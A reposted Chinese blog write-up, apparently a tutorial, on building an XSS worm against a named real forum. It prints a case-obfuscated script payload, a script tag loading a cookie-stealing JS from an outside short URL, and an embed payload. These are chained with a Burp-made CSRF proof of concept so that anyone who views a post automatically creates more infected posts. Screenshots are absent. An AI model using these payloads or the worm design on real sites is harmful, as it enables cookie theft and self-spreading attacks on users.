加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 业界 > 正文

记一次XSS蠕虫渗透实验

发布时间:2019-01-18 05:40:33 所属栏目:业界 来源:莫妮卡k37
导读:大体思路 在发帖的内容处发现了存储型XSS 对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴 所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。
副标题[/!--empirenews.page--]

大体思路

  • 在发帖的内容处发现了存储型XSS
  • 对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴
  • 所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。

以上就是XSS+CSRF构造蠕虫大体的思路,下面细化各个步骤的过程,水平不高,适合XSS初学者的进阶。

XSS蠕虫渗透

一、存储型XSS

1.进入发帖处,添加初步测试payload,并查看源码:

记一次XSS蠕虫渗透实验

2.观察到可以大小写混淆绕过,于是构造payload(对于屏蔽括号的可以用 ’ 来代替):

  1. <sCrIpt>alert'xss'</sCrIpt> 

记一次XSS蠕虫渗透实验

3.刷新页面观察效果,成功弹窗:

记一次XSS蠕虫渗透实验

4.插入JS脚本,利用XSS平台窃取用户cookie,这是最常用的XSS利用手法。

POC:

  1. <sCRiPt/SrC=//60.wf/m5VP> 

SRC引用的是短地址,内容为窃取用户cookie的JS脚本,详细可以使用XSS平台自动生成:

记一次XSS蠕虫渗透实验

二、XSS配合CSRF的初步测验

1.首先验证是否存在CSRF,同样在发布新贴处,填写标题内容,点击发布抓包:

记一次XSS蠕虫渗透实验

2.burp自带的生成CSRF POC,POST包处-》右键-》generate csrf poc -》保存-》使用另一个账号发送POC,查看自己的帖子,发现成功发送新帖。

3.编写JS脚本(可以利用Xss’or来生成)

记一次XSS蠕虫渗透实验

4.CSRF+存储型XSS将脚本插入到页面中:

记一次XSS蠕虫渗透实验

如图,内容为发布新帖的JS脚本,点击发布,就生成了新帖。

5.浏览此贴,提示成功:

记一次XSS蠕虫渗透实验

6.可以看到成功发布出去:

记一次XSS蠕虫渗透实验

7.使用其他用户浏览帖子测试—-发现同样不知觉的发了个新帖,至此,XSS+CSRF的攻击已经完成:

记一次XSS蠕虫渗透实验

三、蠕虫的构造

再整理一下思路。

蠕虫的前提是子贴的内容,即点击我们母感染贴的用户所发布的子贴的内容是可控的:

1.攻击者创建一个攻击帖(母帖),贴中JS脚本包含:​ ①创建一个子回传帖​ ②子回传帖的内容是重定向到母帖​2.用户浏览母帖,然后自动创建一个子回传帖;3.子回传帖403重定向到母帖;​4.根据内容又创建一个子回传帖;​5.用户之间互相浏览,发散,传播,不拉不拉不拉,造成蠕虫攻击。

1.任意发表新帖:

记一次XSS蠕虫渗透实验

2.记录帖子的URL并点击编辑:

记一次XSS蠕虫渗透实验

3.插入JS脚本,其中控制子回传贴302重定向到母贴的URL。

payload:

  1. <embed/src=/bang.duia.com/web/normal/topic/806440> 

意为在页面中插入一个新页面,这个新页面为母贴。

记一次XSS蠕虫渗透实验

4.发布后浏览,已生成子回传贴:

记一次XSS蠕虫渗透实验

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读